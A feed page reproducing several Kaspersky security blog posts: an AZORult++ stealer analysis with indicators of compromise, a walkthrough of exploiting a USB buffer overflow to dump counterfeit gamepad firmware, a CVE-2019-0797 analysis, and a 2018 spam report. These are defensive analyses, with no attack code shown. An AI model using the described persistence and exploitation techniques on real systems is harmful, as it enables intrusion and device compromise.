Kaspersky

Subscribe to Kaspersky hírcsatorna Kaspersky
Frissítve: 1 óra 24 perc
2019. március 22.

AZORult++: Rewriting history

The AZORult Trojan is one of the most commonly bought and sold stealers in Russian forums. Despite the relatively high price tag ($100), buyers like AZORult for its broad functionality (for example, the use of .bit domains as C&C servers to ensure owner anonymity and to make it difficult to block the C&C server), as well as its high performance. Many comment leavers recommend it.

But at the back end of 2018, the main seller, known under the handle CrydBrox, stopped selling the malware:

“All software has a shelf life. It’s run out for AZORult.
It is with joy and sadness that I announce that sales are closed forever.”

Some attribute the move to AZORult 3.2 having become too widely available, likewise the source code of the botnet control panel. This version of the malware spread to other forums where even users without special skills can download and configure it for their own purposes. So the imminent demise of AZORult was apparently down to a lack of regular updates and its overly wide distribution. Yet the story of AZORult does not end there.

In a nutshell

AZORult is a Trojan stealer that collects various data on infected computers and sends it to the C&C server, including browser history, login credentials, cookies, files from folders as specified by the C&C server (for example, all TXT files from the Desktop folder), cryptowallet files, etc.; the malware can also be used as a loader to download other malware. Kaspersky Lab products detect the stealer as Trojan-PSW.Win32.Azorult. Our statistics show that since the start of 2019, users in Russia and India are the most targeted.


Geography of users attacked by Trojan-PSW.Win32.Azorult, 01.01.2019 — 03.18.2019

From Delphi to C++

In early March 2019, a number of malicious files detected by our products caught the eye. Although similar to AZORult already known to us, unlike the original malware, they were written not in Delphi, but in C++. A clear hint at the link between them comes from a section of code left by the developer.

It appears that the acolytes of CrydBrox, the very one who pulled the plug on AZORult, decided to rewrite it in C++; this version we call AZORult++. The presence of lines containing a path to debugging files likely indicates that the malware is still in development, since developers usually try to remove such code as soon as feasible.

AZORult++ starts out by checking the language ID through a call to the GetUserDefaultLangID() function. If AZORult++ is running on a system where the language is identified as Russian, Armenian, Azerbaijani, Belarusian, Georgian, Kazakh, Tajik, Turkmen, or Uzbek, the malware stops executing.

A more detailed analysis reveals that the C++ version is deficient compared to AZORult 3.3, the last iteration to be sold. In particular, there is no loader functionality and no support for stealing saved passwords from many of the browsers supported by AZORult 3.3. At the same time, many signature features of the Delphi-based version 3.3 are present in AZORult++, including the algorithm for communication with the C&C server, the command format, the structure and method of storing harvested data, and encryption keys.

Like AZORult 3.3, AZORult++ uses an XOR operation with a 3-byte key to encrypt data sent to the C&C server. What’s more, this key we had already encountered in various modifications of version 3.3.


Examples of different versions of AZORult in operation (data encrypted using XOR)

The malware collects stolen data in RAM and does not write to the hard drive to keep its actions hidden. A comparison of the data sent in the first packet (the ID of the infected device) shows that AZORult++ uses a shorter string than AZORult 3.3 for identification:

The server response also contains far less data. In version 3.3, the response contained a command in the form “++++-+–+-“, specifying the bot configuration and a link for downloading additional malware, plus several binary files needed for the stealer to work. The string “++++-+–+-” is parsed by the Trojan character-by-character; “+” in a specific position signifies a command to execute certain actions (for example, harvesting of cryptowallet files). The current version of AZORult++ employs a shorter, yet similar command:

It is worth mentioning separately that the resulting configuration string is not processed correctly; the code execution does not depend on the value “+” or “-” in the string, since the characters are checked against \x00 for a match. In other words, the resulting command does not affect the stealer’s behavior:

This seems to be an error on the part of the developer, which suggests again that the project is in the very early stages of development. Going forward, these bugs are expected to be eliminated and the functionality of AZORult++ expanded.

++ up the sleeve

For all its flaws, AZORult++ could actually be more dangerous than its predecessor due to its ability to establish a remote connection to the desktop. To do so, AZORult++ creates a user account using the NetUserAdd() function (username and password are specified in the AZORult++ code), before adding this account to the Administrators group:

Next, AZORult++ hides the newly created account by setting the value of the Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist registry key to 0. Likewise, through setting registry key values, a Remote Desktop Protocol (RDP) connection is allowed:

The malicious cherry on the cake is a call to ShellExecuteW() to open a port to establish a remote connection to the desktop:

After that, the infected computer is ready to accept the incoming RDP connection, which allows the cybercriminal — armed with the victim’s IP address and account information — to connect to the infected computer and seize complete control of it.

Conclusion

During development, AZORult underwent several changes related to the expansion of its functionality. Moreover, despite its many flaws, the C++ version is already more threatening than its predecessor due to the ability to establish a remote connection to the desktop. Because AZORult++ is likely still in development, we should expect its functionality to expand and bugs to be eliminated, not to mention attempts to distribute it widely under a name that buyers will recognize.

IoC

C&C servers
http://ravor.ac[.]ug
http://daticho.ac[.]ug

MD5
08EB8F2E441C26443EB9ABE5A93CD942
5B26880F80A00397BC379CAF5CADC564
B0EC3E594D20B9D38CC8591BAFF0148B
FE8938F0BAAF90516A90610F6E210484

2019. március 21.

Hacking microcontroller firmware through a USB

In this article, I want to demonstrate extracting the firmware from a secure USB device running on the Cortex M0.

Who hacks video game consoles?

The manufacture of counterfeit and unlicensed products is widespread in the world of video game consoles. It’s a multi-billion dollar industry in which demand creates supply. You can now find devices for almost all the existing consoles that allow you to play copies of licensed video game ‘backups’ from flash drives, counterfeit gamepads and accessories, various adapters, some of which give you an advantage over other players, and devices for the use of cheats in online and offline video games. There are even services that let you buy video game achievements without having to spend hours playing. Of course, this is all sold without the consent of the video game console manufacturers.

Modern video game consoles, just like 20 years ago, are proprietary systems where the rules are set by the hardware manufacturers, and not by the millions of customers using those devices. A variety of protective measures are included in their design to ensure these consoles only run signed code, so they only play licensed and legally acquired video games and all players have equal rights and only play with officially licensed accessories. In some countries it’s even illegal to try and hack your own video game console.

But at the same time the very scale of the protection makes these consoles an attractive target and one big ‘crackme’ for enthusiasts interested in information security and reverse engineering. The more difficult the puzzle, the more interesting it is to solve. Especially if you’ve grown up with a love for video games.

Protection scheme of DualShock 4

Readers who follow my twitter account may know that I’m a long-time fan of reverse engineering video game consoles and everything related to them, including unofficial game devices. In the early days of PlayStation 4, a publicly known vulnerability in the FreeBSD kernel (which PlayStation 4 is based on) let me and many other researchers take a look at the architecture and inner workings of the new game console from Sony. I carried out a lot different research, some of which included looking at how USB authentication works in PlayStation 4 and how it distinguishes licensed devices and blocks unauthorized devices. This subject was of interest because I had previously done similar research on other consoles. PlayStation 4’s authentication scheme turned out to be much simpler than that used in Xbox 360, but no less effective.


Authorization scheme of PlayStation 4 USB accessories

PS4 sends 0x100 random bytes to DualShock 4 and in response the gamepad creates an RSASSA-PSS SHA-256 signature and sends it back among the cryptographic constants N and E (public key) needed to verify it. These constants are unique for all manufactured DualShock 4 gamepads. The gamepad also sends a signature needed for verification of N and E. It uses the same RSASSA-PSS SHA-256 algorithm, but the cryptographic constants are equal for all PlayStation 4 consoles and are stored in the kernel.

This means that if you want to authenticate your own USB device, it’s not enough to hack the PlayStation 4 kernel – you need the private key stored inside the gamepad. And even if someone manages to hack a gamepad and obtains the private key, Sony can still blacklist the key with a firmware update. If after eight minutes a game console has not received an authentication response it stops communication with the gamepad and you need to remove it from the USB port and plug it in again to get it to work. That’s how the early counterfeit gamepads worked by simulating a USB port unplug/plug process every eight minutes, and it was very annoying for anyone who bought them.

Rumors of super counterfeit DualShock 4

There were no signs of anyone hacking this authentication scheme for quite some time until I heard rumors about new fake gamepads on the market that looked and worked just like the original. I really wanted to take a look at them, so I ordered a few from Chinese stores.

While I was waiting for my parcels to arrive, I decided to try and gather more information about counterfeit gamepads. After quite a few search requests I found a gamepad known as Gator Claw.


Unauthorized Gator Claw gamepad

There was an interesting discussion on Reddit where people were saying that it worked just like other unauthorized gamepads but only for eight minutes, but that the developers had managed to fix this with a firmware update. The store included a link to the firmware update and a manual.


Firmware update manual for Gator Claw

Basics of embedded firmware analysis

The first thing I did was to take a look at the resource section of the firmware updater executable.


Firmware found in resources of Gator Claw’s firmware updater

Readers who are familiar with writing code for embedded devices will most likely recognize this file format. This is an Intel HEX file format which is commonly used for programming microcontrollers, and many compilers (for example GNU Compiler) may output compiled code in this format. Also, we can see that the beginning of the firmware doesn’t have high entropy and sequences of bytes are easily recognizable. That means the firmware is not encrypted or compressed. After decoding the firmware from Intel HEX format and loading in hex editor (010 Editor is able to open files directly in that format) we are able to take a look at it. What architecture is it compiled for? ARM Cortex-M is so widely adopted that I recognize it straight away.


Gator Claw’s firmware (left) and vector table of ARM Cortex-M (right)

According to the specifications, the first double word is the initial stack pointer and after that comes the table of exception vectors. The first double word in this table is Reset vector that is used as the firmware entry point. The high addresses of other exception handlers give an idea of the firmware’s base address.

Besides firmware, the resource section of the firmware updater also contained a configuration file with a description of different microcontrollers. The developers of the firmware updater most probably used publicly available source code from the manufacturers of microcontrollers, which would explain why this configuration file came with source code.


Configuration file with description of different microcontrollers

After searching the microcontroller identificators from the config file, we found the site of the manufacturer – Nuvoton. Product information among technical documentation and the SDK is freely available for download without any license agreements.


The site of the Nuvoton microcontroller manufacturer

At this point we have the firmware, we know its architecture and microcontroller manufacturer, and we have information about the base address, initial stack pointer and entry point. We have more information than we actually need to load the firmware in IDA Pro and start analyzing it.

ARM processors have two different instruction sets: ARM (32 bit instructions) and Thumb (16-bit instructions extended with Thumb-2 32-bit instructions). Cortex-M0 supports only Thumb mode so we will switch the radio button in “Processor options – Edit ARM architecture options – Set ARM instructions” to “NO” when loading the firmware in IDA Pro.

After that we can see the firmware has loaded at base address 0 and automatic analysis has recognized almost every function. The question now is how to move forward with the reverse engineering of the firmware?


Example of one of the many firmware functions

If we analyze the firmware, we’ll see that throughout it performs read and write operations to memory with the base address 0x40000000. This is the base address of memory mapped input output (MMIO) registers. These MMIO registers allow you to access and control all the microcontroller’s peripheral components. Everything that the firmware does happens through access to them.


Memory map of peripheral controllers

By searching through the technical documentation for the address 0x40000000 we find that this microcontroller belongs to the M451 family. Now that we know the family of the microcontroller, we are able to download the SDK and code samples for this platform. In the SDK we find a header file with a definition of all MMIO addresses, bit fields and structures. We can also compile code samples with all the libraries and compare them with functions in our IDB, or we can look for the names of the MMIO addresses in the source code and compare it with our disassembly. This makes the process of reverse engineering straightforward. That’s because we know the architecture and model of the microcontroller and we have a definition of all MMIO registers. Analysis would be much more complicated if we didn’t have this information. It’s fair to say that is why many vendors only distribute the SDK after an NDA is signed.


Finding library functions in the firmware

In the shadow of colossus

I analyzed Gator Claw’s firmware while waiting for my fake gamepad to arrive. There wasn’t much of interest inside – authentication data is sent to another microcontroller accessible over I2C and the response is sent back to the console. The developers of this unlicensed gamepad knew that this firmware may be reverse engineered and the existence of more counterfeit gamepads may hurt their business. To prevent this, another microcontroller was used for the sole purpose of keeping secrets safe. And this is common practice. The hackers put a lot of effort into their product and don’t want to be hacked too. What really caught my attention in this firmware was the presence of some seemingly unused string. Most likely it was meant to be part of a USB Device Descriptor but that particular descriptor was left unused. Was this string left on purpose? Is it some kind of signature? Quite probably, because this string is the name of a major hardware manufacturer best known for their logic analyzers. But it also turns out they have a gaming division that aims to be an original equipment manufacturer (OEM) and even has a number of patents related to the production of gaming accessories. Besides that, they also have subsidiary and their site has huge assortment of gaming accessories sold under a single brand. Among the products on sale are two dozen adapters that allow the gamepads of one console to be used with another console. For example, there’s one product that lets you connect the gamepad of an Xbox 360 to PlayStation 4, another product that lets you connect a PlayStation 3 gamepad to Xbox One, and so on, including a universal ‘all in one’. The list of products also includes adapters that allow you to connect a PC mouse and keyboard to the PS4, Xbox One and Nintendo Switch video game consoles, various gamepads and printed circuit boards to create your own arcade controllers for gaming consoles. All the products come with firmware updaters similar to the one that was provided for Gator Claw, but with one notable difference – all the firmware is encrypted.


Example of manual and encrypted firmware from resources for one of the products

The printed circuit boards for creating your own arcade controllers let you take a look at PCB design without buying a device and taking it apart. Their design is most likely very close to that of Gator Claw. We can see two microcontrollers; one of them should be Nuvoton M451 and the other is an additional microcontroller to store secrets. All traces go to the microcontroller under black epoxy, so it should be the main microcontroller, and the microcontroller with the four yellow pins seems to have what’s required to work over I2C.


Examples of product PCB design

Revelations

By this time I had finally received my parcel from Shenzhen and this is what I found inside. I think you’ll agree that the counterfeit gamepad looks exactly like the original DualShock 4. And it feels like it too. It’s a wireless gamepad made with good quality materials and has a working touch pad, speaker and headset port.


Counterfeit DualShock 4 (from the outside)

I pressed one of the combinations found in the update instructions and powered it on. The gamepad booted into DFU mode! After connecting the gamepad to a PC in this mode it was recognized as another device with different identifiers and characteristics. I already knew what I was going to see inside…


Counterfeit DualShock 4 (view of main PCB)

I soldered a few wires to what looked like JTAG points and connected it to a JTAG programmer. The programming tool recognized the microcontroller, but a Security Lock was set.


Programming tool recognized microcontroller but Security Lock was enabled

Hacking microcontroller firmware through a USB

After this rather lengthy introduction, it’s now time to return to the main subject of this article. USB (Universal Serial Bus) is an industry standard for peripheral devices. It’s designed to be very flexible and allow a wide range of applications. USB protocol defines two entities – one host to whcih other devices connect. USB devices are divided into classes such as hub, human interface, printer, imaging, mass storage device and others.


Connection scheme of USB devices

Data and control exchange between the devices with the host happens through a set of uni-directional or bi-directional pipes. By pipes we consider data transfers between host software and a particular endpoint on a USB device. One device may have many different endpoints to exchange different types of data.


Data transfer types

There are four different types of data transfers:

  • Control Transfers (used to configure a device)
  • Bulk Data Transfers (generated or consumed in relatively large and bursty quantities)
  • Interrupt Data Transfers (used for timely but reliable delivery of data)
  • Isochronous Data Transfers (occupy a prenegotiated amount of USB bandwidth with a prenegotiated delivery latency)

All USB devices must support a specially designated pipe at endpoint zero to which the USB device’s control pipe will be attached.

Those types of data transfers are implemented with the use of packets provided according to the scheme below.


Packets used in USB protocol

In fact, USB protocol is a state machine and in this article we are not going to examine all those packets. Below you can see an example of the packets used in a Control Transfer.


Control Transfer

USB devices may contain vulnerabilities when implementing Bulk Transfers, Interrupt Transfers, Isochronous Transfers, but those types of data transfers are optional and their presence and usage will vary from target to target. But all USB devices support Control Transfers. Their format is common and this makes this type of data transfer the most attractive to analyze for vulnerabilities.

The scheme below shows the format of the SETUP packet used to perform a Control Transfer.


Format of SETUP packet

The SETUP packet occupies 8 bytes and it can be used to obtain different types of data depending on the type of request. Some requests are common for all devices (for example GET DESCRIPTOR); others depend on the class of device and manufacturer permission. The length of data to send or receive is a 16-bit word provided in the SETUP packet.


Examples of standard and class-specific requests

Summing up: Control Transfers use a very simple protocol that’s supported by all USB devices. It can have lots of additional requests and we can control the size of data. All of that makes Control Transfers a perfect target for fuzzing and glitching.

Exploitation

To hack my counterfeit gamepad I didn’t have to fuzz it because I found vulnerabilities while I was looking at the Gator Claw code.


Vulnerable code in handler of HID class requests

Function HID_ClassRequest() is present to emulate the work of the original DualShock 4 gamepad and implements the bare minimum of required requests to get it working with PlayStation 4. USBD_GetSetupPacket() gets the SETUP packet and depending on the type of report it will either send data with the function USBD_PrepareCntrlIn() or will receive with the function USBD_PrepareCntrlOut(). This function doesn’t check the length of the requested data and this should allow us to read part of the internal Flash memory where the firmware is located and also read and write to the beginning of SRAM memory.


Buffer overflow during Control Transfer

The size of the DATA packet is defined in the USB Device Descriptor (also received with the Control Transfer), but what seems to be left unnoticed is the fact that this size defines the length of a single packet and there may be lots of packets depending on the length set in the SETUP packet.

It is noteworthy that the code samples provided on the site of Nuvoton also don’t have checks for length and it could lead to the spread of similar bugs in all products that used this code as a reference.


Exploitation of buffer overflow in SRAM memory

SRAM (static random access memory) is a memory that among other things is occupied by stack. SRAM is often also executable memory (this is configurable). This is usually done to increase performance by making firmware copy pieces of code that are often called (for example, Real-Time Operating System) to SRAM. There is no guarantee that the top of the stack will be reachable by buffer overflow, but the chances of that are nevertheless high.

Surprisingly, the main obstacle to exploiting USB firmware is the operating system. The following was observed while I was working with Windows, but I think most of it also applies to Linux without special patches.

First of all, the operating system doesn’t let you read more than 4 kb during a Control Transfer. Secondly, in my experience the operating system doesn’t let you write more than a single DATA packet during a Control Transfer. Thirdly, the USB device may have hidden requests and all attempts to use them will be blocked by the OS.

This is easy to demonstrate with human interface devices (HID), including gamepads. HIDs come with additional descriptors (HID Descriptor, Report Descriptor, Physical Descriptor). A Report Descriptor is quite different from the other descriptors and consists of different items that describe supported reports. If a report is missing from Report Descriptor, then the OS will refuse to complete it, even if it’s handled in the device. This basically detracts from the discovery and exploitation of vulnerabilities in the firmware of USB devices and those nuances most probably prevented the discovery of vulnerabilities in the past.

To solve this problem without having to read and recompile the sources of the Linux kernel, I just used low end instruments that I had available at hand: Arduino Mega board and USB Host Shield (total < $30).


Connection scheme

After connecting devices with the above scheme, I used the Arduino board to perform a Control Transfer without any interference from the operating system.


Arduino Mega + USB Host Shield

The counterfeit gamepad had the same vulnerabilities as Gator Claw and the first thing I did was to dump part of the firmware.


Partial dump of firmware

The easiest way to find the base address of the firmware dump is to find a structure with pointers to known data. After that we can calculate the delta of addresses and load a partial dump of the firmware to IDA Pro.


Structure with pointers to known data

The firmware dump allowed us to find out the address of the printf() function that outputs the information in UART required for factory quality assurance. More than that, I was able to find the hexdump() function in the dump, meaning I didn’t even need to write shellcode.


Finding functions that aid exploitation

After locating the UART points on the printed circuit board of the gamepad, soldering wires and connecting them to a TTL2USB adapter, we can see the output in a serial terminal.


Standard UART output during gamepad boot

A standard library for Nuvoton microcontrollers comes with a very handy handler of Hard Fault exceptions that outputs a register dump. This greatly facilitates in exploitation and allows exploits to be debugged.


UART output after Hard Fault exception caused by stack overwrite

A final exploit to dump firmware can be seen in the screenshot below.


Exploit and shellcode to dump firmware over UART

But this way to dump firmware is not perfect because the microcontrollers of the Nuvoton M451 family may have two different types of firmware – main firmware (APROM) and mini-firmware for device firmware update (LDROM).


Memory map of flash memory and system memory in different modes

APROM and LDROM are mapped at the same memory addresses and because of that it’s only possible to dump one of them. To get a dump of LDROM firmware we need to disable the security lock and read the flash memory with a programming tool.


Shellcode that disables security lock

Crypto fail

Analysis of the firmware responsible for updates (LDROM) revealed that it’s mostly standard code from Nuvoton, but with added code to decrypt firmware updates.


Cryptographic algorithm scheme for decryption of firmware updates

The cryptographic algorithm used for decrypting firmware updates is a custom block cipher. It is performed in cipher block chaining mode, but the block size is just 32 bits. This algorithm takes a key that is a textual (ascii) identificator of the product and array of instructions that define what transformation should be performed on the current block. After encountering the end of the key and array their current position is set to the initial position. The list of transformations includes six operations: xor, subtraction, subtraction (reverse), and the same operations but with the bytes swapped. Because the firmware contains large areas filled with zeroes, it makes it easy to calculate the secret parts of this algorithm.


Revealing the firmware update encryption key

Applying the algorithm extracted from the firmware of the counterfeit gamepad to all the firmware of the accessories found on the site of a major OEM manufacturer revealed that all of them use this encryption algorithm, and the weaknesses in this algorithm allowed us to calculate the encryption keys for all devices and decrypt their firmware updates. In other words, the algorithm used inside the counterfeit product led to the security of all the products developed by that manufacturer being compromised.

Conclusion

This blog post turned out to be quite long, but I really wanted to prepare it for a very wide audience. I have given a step-by-step guide on the analysis of embedded firmware, finding vulnerabilities and exploiting them to acquire a firmware dump and to carry out code execution on a USB device.

The subject of glitching attacks is not included in the scope of this article, but such attacks are also very effective against USB devices. For those who want to learn more about them, I recommend watching this video. For those wondering how pirates managed to acquire the algorithm and key from DualShock 4 to make their own devices, I suggest reading this article.

As for the mystery of the auxiliary microcontroller that was used to keep secrets, I found out that it was not used in all devices and was only added for obscurity. This microcontroller doesn’t keep any secrets and is only used for SHA1 and SHA256. This research also aids enthusiasts to create their own open source projects for use with game consoles.

As for buyers of counterfeit gamepads, they are not in an enviable position because manufacturers block illegally used keys and the users end up without a working gamepad or hints on where to get firmware updates.

2019. március 13.

The fourth horseman: CVE-2019-0797 vulnerability

In February 2019, our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis of this event led to us discovering a zero-day vulnerability in win32k.sys. We reported it to Microsoft on February 22, 2019. The company confirmed the vulnerability and assigned it CVE-2019-0797. Microsoft have just released a patch, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin with the discovery:

This is the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows we have discovered recently using our technologies. Just like with CVE-2018-8589, we believe this exploit is used by several threat actors including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to have used zero-days before, SandCat is a new APT we discovered only recently. In addition to CVE-2019-0797 and CHAINSHOT, SandCat also uses the FinFisher/FinSpy framework.

Kaspersky Lab products detected this exploit proactively through the following technologies:

  1. Behavioral detection engine and Automatic Exploit Prevention for endpoint products;
  2. Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA).

Kaspersky Lab verdicts for the artifacts used in this and related attacks are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic
Brief technical details – CVE-2019-0797

CVE-2019-0797 is a race condition that is present in the win32k driver due to a lack of proper synchronization between undocumented syscalls NtDCompositionDiscardFrame and NtDCompositionDestroyConnection. The vulnerable code can be observed below on screenshots made on an up-to-date system during initial analysis:

Snippet of NtDCompositionDiscardFrame syscall (Windows 8.1)

On this screenshot with the simplified logic of the NtDCompositionDiscardFrame syscall you can see that this code acquires a lock that is related to frame operations in the structure DirectComposition::CConnection and tries to find a frame that corresponds to a given id and will eventually call a free on it. The problem with this can be observed on the second screenshot:

Snippet of NtDCompositionDestroyConnection syscall inner function (Windows 8.1)

On this screenshot with the simplified logic of the function DiscardAllCompositionFrames that is called from within the NtDCompositionDestroyConnection syscall you can see that it does not acquire the necessary lock and calls the function DiscardAllCompositionFrames that will release all allocated frames. The problem lies in the fact that when the syscalls NtDCompositionDiscardFrame and NtDCompositionDestroyConnection are executed simultaneously, the function DiscardAllCompositionFrames may be executed at a time when the NtDCompositionDiscardFrame syscall is already looking for a frame to release or has already found it. This condition leads to a use-after-free scenario.

Interestingly, this is the third race condition zero-day exploit used by the same group in addition to CVE-2018-8589 and CVE-2018-8611.

Stop execution if module file name contains substring “chrome.exe”

The exploit that was found in the wild was targeting 64-bit operating systems in the range from Windows 8 to Windows 10 build 15063. The exploitation process for all those operating systems does not differ greatly and is performed using heap spraying palettes and accelerator tables with the use of GdiSharedHandleTable and gSharedInfo to leak their kernel addresses. In exploitation of Windows 10 build 14393 and higher windows are used instead of palettes. Besides that, that exploit performs a check on whether it’s running from Google Chrome and stops execution if it is because vulnerability CVE-2019-0797 can’t be exploited within a sandbox.

2019. március 12.

Spam and phishing in 2018

Numbers of the year
  • The share of spam in mail traffic was 52.48%, which is 4.15 p.p. less than in 2017.
  • The biggest source of spam this year was China (11.69%).
  • 74.15% of spam emails were less than 2 KB in size.
  • Malicious spam was detected most commonly with the Win32.CVE-2017-11882 verdict.
  • The Anti-Phishing system was triggered 482,465,211 times.
  • 18.32% of unique users encountered phishing.
Global events and spam GDPR

In the first months of the year alone, we registered a great many emails in spam traffic connected in some way to the EU General Data Protection Regulation (GDPR). It was generally B2B spam — mostly invitations to paid seminars, webinars, and workshops promising to explain the ins and outs of the new regulation and its ramifications for business.

During this period, there was an upturn in legitimate mailings too. Following the requirements of the regulation, companies sent out notifications on the transition to the GDPR policy requesting user consent to store and process personal data. Unsurprisingly, scammers tried to take advantage. Seeking to gain access to the personal data of clients of well-known companies, they sent out GDPR-related phishing emails prompting to update account information. Users who followed the link in the message and entered the required data immediately had it stolen by the fraudsters. It is worth noting that cybercriminals were interested largely in the data of clients of financial organizations and companies providing IT services.


Phishing emails exploiting the GDPR topic

2018 FIFA World Cup

The FIFA World Cup was one of the main media events of the year, reaching far beyond the world of sport. Scammers exploited the World Cup topic using a variety of classic deception methods based on social engineering. Cybercriminals created fake FIFA partner websites to gain access to victims’ bank accounts, carried out targeted attacks, and set up fake login pages for fifa.com accounts.


Examples of messages with World Cup ticket and trip giveaways

New iPhone launch

As is now customary, Apple’s unveiling of its latest device caused a spike in spam sent, supposedly, from Chinese companies offering accessories and replica gadgets. Such messages redirect the recipient to newly created, generic online stores, which willingly accept payments, but are not so great when it comes to dispatching goods.

The release coincided with a slight rise in the number of phishing messages exploiting the Apple brand (and its services), and emails with malicious attachments:

Malware and the corporate sector

In 2018, the number of malicious messages in spam was 1.2 times less than in 2017; Mail Anti-Virus was triggered a total of 120,310,656 times among Kaspersky Lab clients.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of Mail Anti-Virus triggerings among Kaspersky Lab clients in 2018 (download)

2018 saw a continuation of the trend for attention to detail in email presentation. Cybercriminals imitated actual business correspondence using the companies’ real details, including signatures and logos. To bypass security solutions (and convince users that files were safe), ISO, IQY, PIF, and PUB attachments were used, all non-typical formats for spam.

Credit organizations remain one of the most popular targets, and this trend is likely to continue in 2019. We also expect an increase in the number of attacks on the corporate sector as a whole.

New distribution channels

We have mentioned before that the distribution of phishing and other fraudulent content has gone beyond the scope of mailings. Scammers are not only testing new means of delivery, but getting victims themselves to distribute malicious content. Some of this year’s most massive attacks we registered in messengers and social networks.

“Self-propagating” phishing messages are similar to long-forgotten chain letters. They refer to non-existent giveaways or free lucrative offers, with one of the conditions for participation being to forward the message to friends or publish it on social media. At the start of the year, scammers used free air ticket lotteries as a bait, before switching to mailings supposedly from popular retail chains, restaurants, stores, and coffee bars. WhatsApp was the most common tool for distributing such messages.

Cryptocurrencies and spam

In 2018, far from waning, spammers’ interest in cryptocurrencies rose. Among the spam messages were fraudulent ones attempting to coerce potential victims into transferring money to cryptocurrency wallets.

One of the most popular kinds of fraud seen last year was “sextortion.” This type of ransom scam is based on the claim to be in possession of private information of an intimate nature. To avoid disclosure, the victim is told to transfer money to the cryptocurrency wallet specified in the message, which often looks very convincing and uses the victim’s actual personal data: name, passwords, phone numbers, etc. Against the backdrop of endless news reports about personal data leaks, such threats, backed up by real details, cause victims to panic and give in to the cybercriminals’ demands. Last year, the ransom sum ranged from a few hundred to several thousand dollars.

Initially, the mailings were aimed at an English-speaking audience, but at the end of Q3 we registered a wave of messages in other languages: German, Italian, Arabic, Japanese, French, Greek, and others.

Neither did the scammers forget about other fraud methods. Over the year, we identified fraudulent mailings supposedly from large charitable organizations asking to help children by purchasing some data etc. All these schemes had a common thread: The money transfer was requested in cryptocurrency. It should be noted that such messages were very few compared with the mailings described above.

In 2019, spammers will continue to exploit the cryptocurrency topic. We expect to see more fraudulent mailings aimed at both extracting cryptocurrency and gaining access to personal accounts with various cryptocurrency services.

Phishing Cryptocurrency

Cryptocurrency remains one of the most common phishing topics. In 2018, our Anti-Phishing system prevented 410,786 attempts to redirect users to phishing sites imitating popular cryptocurrency wallets, exchanges, and platforms. Fraudsters are actively creating fake login pages for cryptocurrency services in the hope of getting user credentials.

Another hot topic last year was fake ICOs. Scammers invited victims to invest in various initial coin offerings not only by email, but through social media posts as well. There was something for everyone: One of the scams, for example, targeted buzcoin, a cryptocurrency named after Russian singer Olga Buzova. The cybercrooks managed to get hold of the project mailing list and send fake presale invitations to subscribers the day before the start of the ICO. Before the bona fide organizers had time to sneeze, the attackers had scooped around $15,000.

But it was the blockchain project of Pavel Durov, TON, which had the dubious honor of most fakes back in early 2018. The cryptocurrency boom and rumors in late 2017 about an ICO from the creator of Telegram provided fertile ground. Many people believed the scammers and, despite warnings from Pavel himself on social media, transferred money to them.

Lotteries and surveys

Another way to nudge victims into transferring money is via the promise of a guaranteed lottery win or a reward for taking part in a poll. In 2018, our security solutions blocked 3,200,180 attempted redirects to fraudulent websites offering lotteries or surveys.

To take part in the draw, users are asked to make a contribution: the more you give, the more you (supposedly) get. Survey scams work in a similar way. The victim is asked to transfer a sum of money to pay for “administrative costs,” after which the reward will be transferred, or so it is promised.

Universities

Phishers hunt not only for money, but also for knowledge: Over the past year, we registered phishing attacks against 131 universities in 16 countries. More than half (83) were in the US, followed by Britain (21), and Australia and Canada (7 each). One high-profile incident was the theft of millions of documents (including nuclear energy research) from several British universities.

Taxes

In Q1 (the last quarter of the financial year in many countries), we observed a large number of phishing pages imitating the websites of HMRC (UK), the IRS (US), and other countries’ tax authorities. Cybercriminals tried to finagle personal data, answers to security questions, bank account information, and other data from users. Some fake tax service sites distributed malware.


Fake tax service websites

HTTPS

As we wrote a year earlier, the number of phishing pages on domains with SSL certificates has increased. Ironically, this was facilitated by the widespread adoption of HTTPS, since pages with a certificate (and padlock) are trusted far more. But getting hold of a certificate is not hard, especially for competent cybercriminals. The problem has taken on such dimensions that since September 2018 with the latest version of Chrome, the browser has stopped highlighting HTTPS sites with a green padlock in the address bar and marking them as “Secure.” Instead, the “Not secure” label is now assigned to sites without HTTPS.

Sales

Every year, November sees the start of the sales season. First up is World Shopping Day, followed by Black Friday. Cybercriminals prepare for such events in advance and commence their mass attacks long before the sales start. According to our statistics, the number of attempts to redirect users to fraudulent websites exploiting the sales topic starts to rise at the end of October.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Fraudsters use standard methods to extract personal data and money from victims, including fake websites mimicking popular online stores with huge discounts on expensive goods.

Statistics: spam Proportion of spam in email traffic

The share of spam in email traffic in 2018 decreased by 4.15 p.p. to 52.48%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Proportion of spam in global email traffic, 2018 (download)

The lowest share (47.70%) was recorded in April 2018. The highest (57.26%) belonged to December.

Sources of spam by country

